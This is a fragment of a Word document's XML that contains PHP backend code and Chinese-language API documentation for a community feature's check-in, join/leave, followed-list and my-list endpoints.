    </w:p>
    <w:p w14:paraId="7162DA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1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787184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'update_time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FAD6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134C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$sort = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46777D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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F62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76491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CF431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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2211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08F37A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FA4F0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5B286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用户社区签到成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD23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$circle_member['punches'] + 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF09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'sort' =&gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC34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=&gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E99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6B1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7B9E4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(time() - $circle_member['update_time'] &gt; 3600 * 24 &amp;&amp; time() - $circle_member['update_time'] &lt; 3600 * 48) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C08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Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A82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570E13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5206AA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'punch_in' =&gt; $circle_member['punch_in'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C673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$circle_member['punches'] + 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CA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'update_time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45BF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D9B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$sort = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B95AB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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEE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03DC62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8CBAA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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7848E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204EA3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03F310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ED6F0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用户社区签到成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E806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$circle_member['punches'] + 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41FE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'sort' =&gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D16F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=&gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B810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5663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(time() - $circle_member['update_time'] &gt; 3600 * 48) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762452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Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82C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36E34E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49496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'punch_in' =&gt; $circle_member['punch_in'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213850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0, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879E0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'update_time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9F2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BE4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$sort = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED28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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9F0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2885AD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B597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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21403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36D83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0A87E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AF7B9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用户社区签到成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82C7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0, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102927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'sort' =&gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9FB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=&gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66980F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A8FF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8502F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$sort = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732FA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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE31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308DC3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-&gt;where('update_time', '&lt;', $circle_member['update_time'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998F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0D3175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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87D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'&gt;', strtotime('today'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4A2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-&gt;where('update_time', '&lt;', $circle_member['update_time'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DD0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595E4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278F3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今日你已签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451150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'punches' =&gt; $circle_member['punches'], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443AE4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'sort' =&gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C7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'total_sort' =&gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5841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CBF9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2BFD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B16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ADA02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88EDE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请先加入社区，然后签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFFC2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2DC6ED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9FFF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1A48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636A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00F1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/api/circle/follow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户加入｜退出社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4635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当前登录用户加入｜退出社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8CB8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448AF0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13866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0BCE1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circle_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D367D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用户加入｜退出社区成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E885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标识位：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>退出；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F661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用户加入社区失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F44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3AC088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5000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follow()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331C8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E23D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D6DDE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0AF7D9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16D01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DD876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请先登录账号，然后加入社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643624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0C1F15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905A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DF7A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$data['circle_id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C6C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($data['circle_id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B19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E450B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用户社区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29D05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91C6C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79B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968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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDE8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-&gt;where('id', $data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81A6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EE9A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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15828E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$circle_member = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9A6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2354E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0AE59A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(!empty($circle_member)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561C6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($circle_member['follow'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33051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Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFEC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6356BC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11878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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B9E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054750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E8C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01A7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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683B2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-&gt;setDec('follower_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CE3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】已退出您所创建的社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5948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$circle['member_id'], $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533F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您已退出社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E7D2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notify($circle['member_id'], $this-&gt;memberId, $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8569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534E9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用户退出社区成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E4DA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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB148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2C43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C3745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Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F72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0761C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4CF02C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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E882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56D59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EDAE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B504D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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C35F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-&gt;setInc('follower_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AA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】已加入你所创建的社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5327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$circle['member_id'], $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B6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您已加入社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563026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notify($circle['member_id'], $this-&gt;memberId, $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DD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FA91C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用户加入社区成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C653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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247306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C0B1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6F34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73AAC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$data['follow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F7F3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$data['punch_in'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63342A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$data['punches'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DA6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4F1D50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$circle_member_id = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32981A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103399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($circle_member_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A63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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF1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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9DDD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-&gt;setInc('follower_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39DD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】已加入你所创建的社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ED00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$circle['member_id'], $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D4E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您已加入社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002A2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notify($circle['member_id'], $this-&gt;memberId, $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AE3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28B4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用户加入社区成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EEE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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7E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49D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0CC8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7356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CBAC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386D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该用户社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1669E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789BB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2242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67D1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ACB27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用户加入社区失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3B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353E09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0301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4B7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2A2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/api/circle/followed_list </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户关注的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A53A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获取当前用户关注的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D106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5FE0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E00E7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03BC99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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75611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per_page </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC7D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当前用户关注的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F9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用户社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700580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   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2703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用户社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C419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    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区所属分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53140D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当前用户是否已关注社区：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434AA6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21DADD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64649F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4237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followed_list()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E669A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3144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3A10BC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6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F187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$followed_circle_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A50A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E8C0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$followed_circles = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C64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15633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19CE10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-&gt;field('circle_id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FD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25CC02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(count($followed_circles) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8794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($followed_circles as $followed_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5245BF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$followed_circle_ids[] = $followed_circle['circle_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C159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8DDD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96962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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0134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18370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=&gt; 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E66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"current_page" =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B6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12DDF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87B1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json($circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA7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2A31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3B1D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92F0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1B4D3D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7D3447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B24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D752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(count($followed_circle_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A846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153275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'in', $followed_circle_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE5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2AE6AA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6E28A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29A9D4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340A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC1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4D3C94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=&gt; 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CBC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"current_page" =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574567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1CA0AB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EA2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FCC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(count($circles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17985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($circles['data'] as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B33F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(!$circle['img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23876D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$circles['data'][$key]['img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7130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A4D1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$circles['data'][$key]['img'] = _imgUrl() . $circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3A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73C0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$circles['data'][$key]['des'] = is_null($circle['des']) ? 0 : $circle['des'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629EFC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$circles['data'][$key]['hide'] = is_null($circle['hide']) ? 0 : $circle['hide'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BF3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$circles['data'][$key]['article_num'] = is_null($circle['article_num']) ? 0 : $circle['article_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05E4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$circles['data'][$key]['follower_num'] = is_null($circle['follower_num']) ? 0 : </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$circle['follower_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201936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$circles['data'][$key]['type'] = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253D8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$circle['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B7BC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-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D681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2E0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4787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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8807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87FB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json($circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C45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74F9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990F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/api/circle/my_list </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户创建的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D029F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获取当前用户创建的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BF01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429AE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B7332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1D58BE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A2E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per_page </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DEA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当前用户创建的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D0D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用户社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDBA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   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172292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用户社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245167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    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区所属分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC19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399E4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8AB38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964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my_list()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40148C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69AC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41312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AC96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0B1C1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4FA980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AC1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36ED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3848F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6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63579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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D1F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47EFDD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580C82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72E5B5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(count($my_circles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71705F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($my_circles['data'] as $key =&gt; $my_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C76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(!$my_circle['img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0E1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$my_circles['data'][$key]['img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F83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D1449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$my_circles['data'][$key]['img'] = _imgUrl() . $my_circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4D56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F3E8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$my_circles['data'][$key]['des'] = is_null($my_circle['des']) ? 0 : $my_circle['des'];</w:t>
      </w:r>
    </w:p>
